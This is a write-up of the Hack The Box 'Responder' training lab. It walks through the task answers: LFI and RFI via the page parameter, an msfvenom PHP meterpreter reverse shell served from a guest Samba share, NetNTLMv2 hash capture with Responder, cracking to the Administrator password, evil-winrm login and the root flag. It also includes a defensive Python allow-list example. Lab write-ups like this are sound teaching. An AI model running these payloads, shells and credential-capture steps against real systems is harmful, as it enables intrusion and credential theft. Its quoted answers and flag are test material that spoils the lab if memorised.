HTB - Starting Point: Responder - writeup:
Target IP Address: 10.129.17.20

```bash
export IP="10.129.17.20"
```
Tasks
Task1: When visiting the web service using the IP address, what is the domain that we are being redirected to?
```bash
curl $IP
<meta http-equiv="refresh" content="0;url=http://unika.htb/">
```

The site only works by name, so add `10.129.17.20 unika.htb` to /etc/hosts before continuing.
A: unika.htb
Task2: Which scripting language is being used on the server to generate webpages?
```bash
sudo nikto -h http://$IP
perl: warning: Setting locale failed.
perl: warning: Please check that your locale settings:
LANGUAGE = "",
LC_ALL = (unset),
LANG = "de_DE.UTF-8"
are supported and installed on your system.
perl: warning: Falling back to the standard locale ("C").
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 10.129.128.80
+ Target Hostname: 10.129.128.80
+ Target Port: 80
+ Start Time: 2022-09-13 15:56:59 (GMT2)
---------------------------------------------------------------------------
+ Server: Apache/2.4.52 (Win64) OpenSSL/1.1.1m PHP/8.1.1
+ Retrieved x-powered-by header: PHP/8.1.1
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
```

Both the Server banner (Apache on Win64 with PHP/8.1.1) and the X-Powered-By header give the language away. Note that the target address in this and some later output is 10.129.128.80 rather than 10.129.17.20; the box was evidently spawned more than once while this was written up, which is why the two addresses alternate below.

A: PHP
Task3: What is the name of the URL parameter which is used to load different language versions of the webpage?
The language switcher on the site links to index.php?page=french.html and index.php?page=german.html, so the parameter is page.
A: page
Task4: Which of the following values for the page parameter would be an example of exploiting a Local File Include (LFI) vulnerability: "french.html", "//10.10.14.6/somefile", "../../../../../../../../windows/system32/drivers/etc/hosts", "mimikatz.exe"?
The page parameter is passed to include() without validation, so a traversal sequence walks out of the web root and reads an arbitrary file from the local disk. I was able to exploit LFI like so (the enough-dots-to-reach-the-drive-root trick: extra ../ segments past the root are harmless):
http://unika.htb/index.php?page=../../../../../../../../windows/system32/drivers/etc/hosts
A: ../../../../../../../../windows/system32/drivers/etc/hosts
Task5: Which of the following values for the page parameter would be an example of exploiting a Remote File Include (RFI) vulnerability: "french.html", "//10.10.14.6/somefile", "../../../../../../../../windows/system32/drivers/etc/hosts", "mimikatz.exe"?
A value that points at another host (a URL, or here a UNC-style //host/share path) makes the server fetch and include code from that host instead of a local file.
A: //10.10.14.6/somefile
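To make the LFI/RFI distinction concrete, here is an added Python model of the vulnerable include behind index.php?page=... next to a hardened version. It is example code, not the site's PHP: the directory layout (PAGES_DIR) and the allow-list of language files (ALLOWED_PAGES) are assumptions, and it runs the four candidate values from Tasks 4 and 5 through both versions.

```python
"""Model of the vulnerable include behind index.php?page=... and a hardened version.

Added example, not the site's PHP. Layout is assumed: pages live in PAGES_DIR
and the only legitimate values are the language files in ALLOWED_PAGES.
"""
import os
import re

PAGES_DIR = "/var/www/html/pages"                                # assumed docroot layout
ALLOWED_PAGES = ("english.html", "french.html", "german.html")   # assumed allow-list

# Candidate values from Tasks 4 and 5
CANDIDATES = [
    "french.html",
    "//10.10.14.6/somefile",
    "../../../../../../../../windows/system32/drivers/etc/hosts",
    "mimikatz.exe",
]

# A value that PHP's include() would hand to a stream wrapper or, on Windows,
# to the SMB client: scheme://host/..., //host/share/... or \\host\share\...
REMOTE = re.compile(r"^(//|\\\\|[a-z][a-z0-9+.\-]*://)", re.I)


def resolve_unchecked(page, pages_dir=PAGES_DIR):
    """What include($_GET['page']) opens when nothing is validated."""
    if REMOTE.match(page):
        return page
    return os.path.normpath(os.path.join(pages_dir, page))


def classify(page, pages_dir=PAGES_DIR):
    """'RFI' if the include leaves the host, 'LFI' if it leaves pages_dir, else 'local'."""
    target = resolve_unchecked(page, pages_dir)
    if REMOTE.match(target):
        return "RFI"
    if os.path.commonpath([pages_dir, target]) != pages_dir:
        return "LFI"
    return "local"


def safe_include(page, pages_dir=PAGES_DIR, allowed=ALLOWED_PAGES):
    """Hardened lookup: allow-list the name, then prove the resolved path stays in pages_dir.

    The second check is belt-and-braces against a future allow-list entry that
    contains a separator, or a symlink inside pages_dir that points elsewhere.
    """
    if page not in allowed:
        raise ValueError(f"page {page!r} is not an allowed page")
    base = os.path.realpath(pages_dir)
    target = os.path.realpath(os.path.join(base, page))
    if os.path.commonpath([base, target]) != base:
        raise ValueError(f"page {page!r} resolves outside {base}")
    return target


def rejects(page):
    """True if the hardened version refuses this value."""
    try:
        safe_include(page)
    except ValueError:
        return True
    return False


if __name__ == "__main__":
    for value in CANDIDATES:
        print(f"{classify(value):5s}  {value}  ->  {resolve_unchecked(value)}")
```

The point of the hardened version is that it never lets the parameter act as a path at all: the name is matched against a fixed allow-list first, and the realpath containment check is only a second line of defence. Filtering "../" or "//" out of the string instead is the classic mistake, because encodings and platform-specific separators (backslashes on Windows) slip past it.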
Task6: What does NTLM stand for?
A: New Technology LAN Manager
Task7: Which flag do we use in the Responder utility to specify the network interface?
A: -I
Task8: There are several tools that take a NetNTLMv2 challenge/response and try millions of passwords to see if any of them generate the same response. One such tool is often referred to as `john`, but the full name is what?
A: John the Ripper
Task9: What is the password for the administrator user?
For this task we will need the tool Responder:

```bash
git clone https://github.com/lgandx/Responder
```

The plan: point the page parameter at a UNC path on our machine. PHP on Windows opens \\host\share\file.php through the operating system's SMB client, and that SMB connection authenticates with NTLM as the account the web server runs under. Responder's rogue SMB server answers the connection and records the NetNTLMv2 challenge/response. I was able to run Responder and capture hashes this way, and by serving a PHP meterpreter file on the share so that the include also executed it, I ultimately got a shell.
```bash
cd Responder
sudo responder -i 10.10.16.156 -I tun0
__
.----.-----.-----.-----.-----.-----.--| |.-----.----.
| _| -__|__ --| _ | _ | | _ || -__| _|
|__| |_____|_____| __|_____|__|__|_____||_____|__|
|__|
NBT-NS, LLMNR & MDNS Responder 3.1.3.0
To support this project:
Patreon -> https://www.patreon.com/PythonResponder
Paypal -> https://paypal.me/PythonResponder
Author: Laurent Gaffie (laurent.gaffie@gmail.com)
To kill this script hit CTRL-C
[+] Poisoners:
LLMNR [ON]
NBT-NS [ON]
MDNS [ON]
DNS [ON]
DHCP [OFF]
[+] Servers:
HTTP server [ON]
HTTPS server [ON]
WPAD proxy [OFF]
Auth proxy [OFF]
SMB server [ON]
Kerberos server [ON]
SQL server [ON]
FTP server [ON]
IMAP server [ON]
POP3 server [ON]
SMTP server [ON]
DNS server [ON]
LDAP server [ON]
RDP server [ON]
DCE-RPC server [ON]
WinRM server [ON]
[+] HTTP Options:
Always serving EXE [OFF]
Serving EXE [OFF]
Serving HTML [OFF]
Upstream Proxy [OFF]
[+] Poisoning Options:
Analyze Mode [OFF]
Force WPAD auth [OFF]
Force Basic Auth [OFF]
Force LM downgrade [OFF]
Force ESS downgrade [OFF]
[+] Generic Options:
Responder NIC [tun0]
Responder IP [10.10.16.156]
Responder IPv6 [dead:beef:4::109a]
Challenge set [random]
Don't Respond To Names ['ISATAP']
[+] Current Session Variables:
Responder Machine Name [WIN-56MT5U5SZ1U]
Responder Domain Name [8EZQ.LOCAL]
Responder DCE-RPC Port [49418]
[+] Listening for events...
```

Only `-I tun0` (Task 7) is strictly needed; the `[+] Servers:` list shows that Responder is now holding a rogue SMB listener on TCP 445 of our VPN interface, which is the one that will receive the target's authentication attempt.
Let's create a PHP payload with msfvenom and host it on our machine so the target can include it over SMB (a multi/handler for php/meterpreter/reverse_tcp on port 4444 catches the callback):

```bash
msfvenom -p php/meterpreter/reverse_tcp LHOST=10.10.16.156 LPORT=4444 -o payload.php
[-] No platform was selected, choosing Msf::Module::Platform::PHP from the payload
[-] No arch selected, selecting arch: php from the payload
No encoder specified, outputting raw payload
Payload size: 1113 bytes
Saved as: payload.php
```

A plain http:// RFI does not work here. Including a remote URL is governed by PHP's allow_url_include directive (off by default) together with allow_url_fopen, and on this server they are disabled. A UNC path such as \\10.10.16.156\ica\payload.php is a different case: on Windows it is not a URL wrapper at all but a filesystem path that the OS resolves through its SMB client, so include() fetches it regardless of those settings. That is what makes the Samba route work; the technique is described at https://www.mannulinux.org/2019/05/exploiting-rfi-in-php-bypass-remote-url-inclusion-restriction.html
Now I will need to set up Samba with a read-only guest share that serves the payload:

```bash
apt-get install samba
mkdir /var/www/html/pub/
chmod 0555 /var/www/html/pub/
chown -R nobody:nogroup /var/www/html/pub/
# Replace the default config with a single anonymous, read-only share
echo > /etc/samba/smb.conf
echo "[global]
workgroup = WORKGROUP
server string = Samba Server %v
netbios name = indishell-lab
security = user
map to guest = bad user
name resolve order = bcast host
dns proxy = no
bind interfaces only = yes
[ica]
path = /var/www/html/pub
writable = no
guest ok = yes
guest only = yes
read only = yes
directory mode = 0555
force user = nobody" > /etc/samba/smb.conf
service smbd restart
cp payload.php /var/www/html/pub
```

`map to guest = bad user` plus `guest ok = yes` means any account name the target presents is accepted, so the Windows SMB client's NTLM attempt succeeds and the file is served.
After pointing my browser to http://unika.htb/index.php?page=\\10.10.16.156\ica\payload.php I got a meterpreter shell:

```bash
[*] Started reverse TCP handler on 10.10.16.156:4444
[*] Sending stage (39927 bytes) to 10.129.128.80
[*] Meterpreter session 1 opened (10.10.16.156:4444 -> 10.129.128.80:49482) at 2022-09-13 16:49:37 +0200
meterpreter >
```

One caveat: Responder's own SMB server and smbd both want TCP 445 on the same address, and whichever starts first gets it. For Task 9 the Samba share is optional. The NetNTLMv2 response is sent during SMB authentication, before any file is read, so Responder alone (with its SMB server ON) captures it even though the include then fails on the target. The share is only needed if the payload should actually be fetched and executed.
With Responder listening, the same request captures the connection and dumps the NetNTLMv2 challenge/response:

```bash
[SMB] NTLMv2-SSP Client : 10.129.17.20
[SMB] NTLMv2-SSP Username : RESPONDER\Administrator
[SMB] NTLMv2-SSP Hash : Administrator::RESPONDER:6b65ae6b782b…
[*] Skipping previously captured hash for RESPONDER\Administrator
[*] Skipping previously captured hash for RESPONDER\Administrator
[*] Skipping previously captured hash for RESPONDER\Administrator
[*] Skipping previously captured hash for RESPONDER\Administrator
```

The web server runs as Administrator on the machine RESPONDER, so that is the account whose credential leaks. The line has the form user::domain:server_challenge:NTProofStr:blob. What we hold is a NetNTLMv2 challenge/response, not the account's NT hash: it cannot be replayed or used for pass-the-hash, only cracked offline (or relayed live with a tool like ntlmrelayx where SMB signing is not enforced). Responder also writes it to its logs directory as SMB-NTLMv2-SSP-10.129.17.20.txt.
I saved the NetNTLMv2 line to a file ntlm2_hash and now I will try to crack it with John the Ripper:

```bash
john ntlm2_hash --wordlist=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (netntlmv2, NTLMv2 C/R [MD4 HMAC-MD5 32/64])
Will run 8 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
badminton (Administrator)
1g 0:00:00:00 DONE (2022-09-13 17:55) 11.11g/s 45511p/s 45511c/s 45511C/s 123456..oooooo
Use the "--show --format=netntlmv2" options to display all of the cracked passwords reliably
Session completed.
```

I am using the password list rockyou.txt here because it contains the most commonly used passwords, and john detected the netntlmv2 format from the line itself. It was immediately able to crack the hash: for every candidate john computes the same MD4 and HMAC-MD5 steps the client performed and compares the result with the captured NTProofStr.

The password of the Administrator account is badminton.
Task10: We’ll use a Windows service (i.e. running on the box) to remotely access the Responder machine using the password we recovered. What port TCP does it listen on?
A: 5985

The scan below was run against 10.10.16.156, which is our own tun0 address (the `Responder IP` in the banner above), not the target. The open ports it reports are Responder's rogue listeners: compare them with the `[+] Servers:` list in the banner (FTP 21, SMTP 25 and 587, DNS 53, HTTP 80, Kerberos 88, POP3 110, MSRPC 135, NetBIOS 139, IMAP 143, LDAP 389, HTTPS 443, SMB 445, MSSQL 1433, RDP 3389, WinRM 5985 and 5986, plus the randomly chosen DCE-RPC port, which differs on every start). So it happens to show 5985, but it proves nothing about the target; the check that actually answers the question is a scan of the box itself, e.g. `nmap -p 5985,5986 $IP`.

```bash
nmap -v 10.10.16.156 -p-
Starting Nmap 7.92 ( https://nmap.org ) at 2022-09-13 18:03 CEST
Initiating Ping Scan at 18:03
Scanning 10.10.16.156 [2 ports]
Completed Ping Scan at 18:03, 0.00s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 18:03
Completed Parallel DNS resolution of 1 host. at 18:03, 0.00s elapsed
Initiating Connect Scan at 18:03
Scanning 10.10.16.156 [65535 ports]
Discovered open port 139/tcp on 10.10.16.156
Discovered open port 3389/tcp on 10.10.16.156
Discovered open port 53/tcp on 10.10.16.156
Discovered open port 443/tcp on 10.10.16.156
Discovered open port 445/tcp on 10.10.16.156
Discovered open port 25/tcp on 10.10.16.156
Discovered open port 110/tcp on 10.10.16.156
Discovered open port 80/tcp on 10.10.16.156
Discovered open port 21/tcp on 10.10.16.156
Discovered open port 135/tcp on 10.10.16.156
Discovered open port 587/tcp on 10.10.16.156
Discovered open port 143/tcp on 10.10.16.156
Discovered open port 5986/tcp on 10.10.16.156
Discovered open port 88/tcp on 10.10.16.156
Discovered open port 45107/tcp on 10.10.16.156
Discovered open port 5985/tcp on 10.10.16.156
Discovered open port 389/tcp on 10.10.16.156
Discovered open port 1433/tcp on 10.10.16.156
Completed Connect Scan at 18:03, 1.87s elapsed (65535 total ports)
Nmap scan report for 10.10.16.156
Host is up (0.00012s latency).
Not shown: 65517 closed tcp ports (conn-refused)
PORT STATE SERVICE
21/tcp open ftp
25/tcp open smtp
53/tcp open domain
80/tcp open http
88/tcp open kerberos-sec
110/tcp open pop3
135/tcp open msrpc
139/tcp open netbios-ssn
143/tcp open imap
389/tcp open ldap
443/tcp open https
445/tcp open microsoft-ds
587/tcp open submission
1433/tcp open ms-sql-s
3389/tcp open ms-wbt-server
5985/tcp open wsman
5986/tcp open wsmans
45107/tcp open unknown
```

TCP 5985 is `wsman`, WinRM over HTTP; 5986 is the same service over HTTPS. WinRM is Microsoft's implementation of the WS-Management protocol, and it is the remote management service that evil-winrm talks to with the password we recovered.
Submit root flag
Let's grab Evil-WinRM:

```bash
git clone https://github.com/Hackplayers/evil-winrm
```
I started Responder again at this point. It is not needed for the WinRM login itself, but it keeps capturing anything that authenticates to our host while we work:

```bash
cd Responder
sudo python3 Responder.py -I tun0
__
.----.-----.-----.-----.-----.-----.--| |.-----.----.
| _| -__|__ --| _ | _ | | _ || -__| _|
|__| |_____|_____| __|_____|__|__|_____||_____|__|
|__|
NBT-NS, LLMNR & MDNS Responder 3.1.3.0
To support this project:
Patreon -> https://www.patreon.com/PythonResponder
Paypal -> https://paypal.me/PythonResponder
Author: Laurent Gaffie (laurent.gaffie@gmail.com)
To kill this script hit CTRL-C
[+] Poisoners:
LLMNR [ON]
NBT-NS [ON]
MDNS [ON]
DNS [ON]
DHCP [OFF]
[+] Servers:
HTTP server [ON]
HTTPS server [ON]
WPAD proxy [OFF]
Auth proxy [OFF]
SMB server [ON]
Kerberos server [ON]
SQL server [ON]
FTP server [ON]
IMAP server [ON]
POP3 server [ON]
SMTP server [ON]
DNS server [ON]
LDAP server [ON]
RDP server [ON]
DCE-RPC server [ON]
WinRM server [ON]
[+] HTTP Options:
Always serving EXE [OFF]
Serving EXE [OFF]
Serving HTML [OFF]
Upstream Proxy [OFF]
[+] Poisoning Options:
Analyze Mode [OFF]
Force WPAD auth [OFF]
Force Basic Auth [OFF]
Force LM downgrade [OFF]
Force ESS downgrade [OFF]
[+] Generic Options:
Responder NIC [tun0]
Responder IP [10.10.16.156]
Responder IPv6 [dead:beef:4::109a]
Challenge set [random]
Don't Respond To Names ['ISATAP', 'ISATAP.LOCAL']
[+] Current Session Variables:
Responder Machine Name [WIN-S84T8YLFEZG]
Responder Domain Name [AJ0U.LOCAL]
Responder DCE-RPC Port [47321]
[+] Listening for events...
```
Next we connect with evil-winrm to the WinRM service on the target, using the cracked Administrator password:

```bash
cd evil-winrm
./evil-winrm.rb -i 10.129.17.20 -u administrator -p badminton
Evil-WinRM shell v3.4
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM Github: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> cd..
*Evil-WinRM* PS C:\Users\Administrator> cd ..
*Evil-WinRM* PS C:\Users> ls
Directory: C:\Users
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 3/9/2022 5:35 PM Administrator
d----- 3/9/2022 5:33 PM mike
d-r--- 10/10/2020 12:37 PM Public
*Evil-WinRM* PS C:\Users> cd mike
*Evil-WinRM* PS C:\Users\mike> ls
Directory: C:\Users\mike
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 3/10/2022 4:51 AM Desktop
*Evil-WinRM* PS C:\Users\mike> cd Desktop
*Evil-WinRM* PS C:\Users\mike\Desktop> ls
Directory: C:\Users\mike\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 3/10/2022 4:50 AM 32 flag.txt
*Evil-WinRM* PS C:\Users\mike\Desktop> cat flag.txt
ea81b7afddd03efaa0945333ed147fac
```

The flag sits in mike's profile rather than Administrator's, but since we are Administrator we can read every user's files.
root flag: ea81b7afddd03efaa0945333ed147fac
That’s it!
Thanks for tuning in !